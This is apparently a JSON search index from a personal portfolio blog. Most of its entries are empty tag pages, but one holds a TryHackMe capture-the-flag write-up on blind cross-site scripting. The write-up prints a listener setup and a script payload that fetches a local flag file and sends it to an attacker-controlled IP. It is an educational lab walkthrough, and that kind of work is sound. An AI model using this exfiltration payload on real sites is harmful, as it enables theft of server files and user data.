[{"content":"","date":"24 April 2026","externalUrl":null,"permalink":"/posts/blogs/","section":"Posts","summary":"","title":"Blogs","type":"posts"},{"content":"Sample content 1\n","date":"24 April 2026","externalUrl":null,"permalink":"/posts/blogs/magic-bytes/","section":"Posts","summary":"","title":"Magic Bytes in Files","type":"posts"},{"content":"","date":"24 April 2026","externalUrl":null,"permalink":"/posts/","section":"Posts","summary":"","title":"Posts","type":"posts"},{"content":"","date":"24 April 2026","externalUrl":null,"permalink":"/","section":"Saptarshi's Portfolio","summary":"","title":"Saptarshi's Portfolio","type":"page"},{"content":"","date":"10 April 2026","externalUrl":null,"permalink":"/tags/async-await/","section":"Tags","summary":"","title":"Async-Await","type":"tags"},{"content":"","date":"10 April 2026","externalUrl":null,"permalink":"/tags/blind-xss/","section":"Tags","summary":"","title":"Blind-Xss","type":"tags"},{"content":"","date":"10 April 2026","externalUrl":null,"permalink":"/categories/","section":"Categories","summary":"","title":"Categories","type":"categories"},{"content":"","date":"10 April 2026","externalUrl":null,"permalink":"/tags/fetch-api/","section":"Tags","summary":"","title":"Fetch-Api","type":"tags"},{"content":"","date":"10 April 2026","externalUrl":null,"permalink":"/tags/rce/","section":"Tags","summary":"","title":"Rce","type":"tags"},{"content":"","date":"10 April 2026","externalUrl":null,"permalink":"/tags/","section":"Tags","summary":"","title":"Tags","type":"tags"},{"content":" Introduction # Difficulty: Easy Time: 120 mins Your local sticker shop has finally developed its own webpage. They do not have too much experience regarding web development, so they decided to develop and host everything on the same computer that they use for browsing the internet and looking at customer feedback. Smart move!\nCan you read the flag at http://10.49.171.129:8080/flag.txt?\nExploring the website # From the intro text, it is obvious the webserver is at 8080. So open it up in the browser and we are greeted with a sticker shop landing page.\nUpon further exploring, we come across a feedback page, where users can provide feedback.\nThis could potentially lead to XSS (Cross site scripting). Let\u0026rsquo;s check for the most basic XSS exploit.\n\u0026lt;script\u0026gt;alert(1);\u0026lt;/script\u0026gt; On submitting it, nothing really happened just a thank you message appeared.\nSo our little script tag did not get executed, or else we would have seen a pop-up box with 1 in it. To test whether our code really gets executed or not, we use fetch.\nBefore that, open up a terminal and setup your listening server. It opens port 1337 and listen for incoming connections (more like incoming HTTP requests).\n$ python3 -m http.server 1337 Serving HTTP on 0.0.0.0 port 1337 (http://0.0.0.0:1337/) ... Now our test payload.\n\u0026lt;script\u0026gt;fetch(\u0026#39;http://192.168.139.54:1337\u0026#39;)\u0026lt;/script\u0026gt; This IP is not your local IP. This is the IP provided when you connect to TryHackMe\u0026rsquo;s VPN.\nNow when you click on Submit, you would see something like this in your terminal.\n$ python3 -m http.server 1337 Serving HTTP on 0.0.0.0 port 1337 (http://0.0.0.0:1337/) ... 10.49.171.129 - - [10/Apr/2026 10:35:27] \u0026#34;GET / HTTP/1.1\u0026#34; 200 - This indicates our payload did get executed (but on the server side. That\u0026rsquo;s why we can\u0026rsquo;t see the pop-up) and we can see a request made from the machine\u0026rsquo;s IP to our server.\nExploit # We can weaponize this and read the flag.txt file. One thing to note, if we manually tried to access the flag like this http://10.49.171.129:8080/flag.txt we get 401 Unauthorized.\nSo the final payload looks something like this\n\u0026lt;script\u0026gt; async function exfil() { const resp = await fetch(\u0026#39;http://127.0.0.1:8080/flag.txt\u0026#39;); const flag = await resp.text(); await fetch(\u0026#39;http://192.168.139.54:1337?flag=\u0026#39; + flag); } exfil(); \u0026lt;/script\u0026gt; What\u0026rsquo;s the need for async? Since fetch API is asynchronous, if we do not wrap fetch inside async function, it returns a Promise object. So we need to await the Promise object to get the HTTP response.\nExplanation # exfil() is an async function because we have used fetch inside of it. To use async functions inside function blocks, the outer function must be declared as async. It first fetches the flag locally. Since the code gets executed on the server, we can locally access the flag. It\u0026rsquo;s just hosts other than localhost can\u0026rsquo;t access it. Now we have a Promise in resp variable. We need to await it to get the actual server response. To get the flag, we await the response and store it in flag variable. Then we just make a GET request to our attacker server containing the flag as a GET parameter. This way we can view the flag as soon as the request is made in the terminal. Then we just call the exfil() function. (exfil stands for exfiltrate).\nClicking Submit, you should see something like this in the terminal\n$ python3 -m http.server 1337 Serving HTTP on 0.0.0.0 port 1337 (http://0.0.0.0:1337/) ... 10.49.171.129 - - [10/Apr/2026 10:35:27] \u0026#34;GET / HTTP/1.1\u0026#34; 200 - 10.49.171.129 - - [10/Apr/2026 10:47:17] \u0026#34;GET /?flag=THM{REDACTED} HTTP/1.1\u0026#34; 200 - There you go! You have your flag!\n","date":"10 April 2026","externalUrl":null,"permalink":"/posts/thm-writeups/the-sticker-shop/","section":"Posts","summary":"","title":"The Sticker Shop - TryHackMe (Easy)","type":"posts"},{"content":"","date":"10 April 2026","externalUrl":null,"permalink":"/categories/thm-writeup/","section":"Categories","summary":"","title":"Thm-Writeup","type":"categories"},{"content":"","date":"10 April 2026","externalUrl":null,"permalink":"/posts/thm-writeups/","section":"Posts","summary":"","title":"TryHackMe Writeups","type":"posts"},{"content":"","externalUrl":null,"permalink":"/about/","section":"Saptarshi's Portfolio","summary":"","title":"About Me","type":"page"},{"content":"","externalUrl":null,"permalink":"/authors/","section":"Authors","summary":"","title":"Authors","type":"authors"},{"content":"","externalUrl":null,"permalink":"/series/","section":"Series","summary":"","title":"Series","type":"series"}]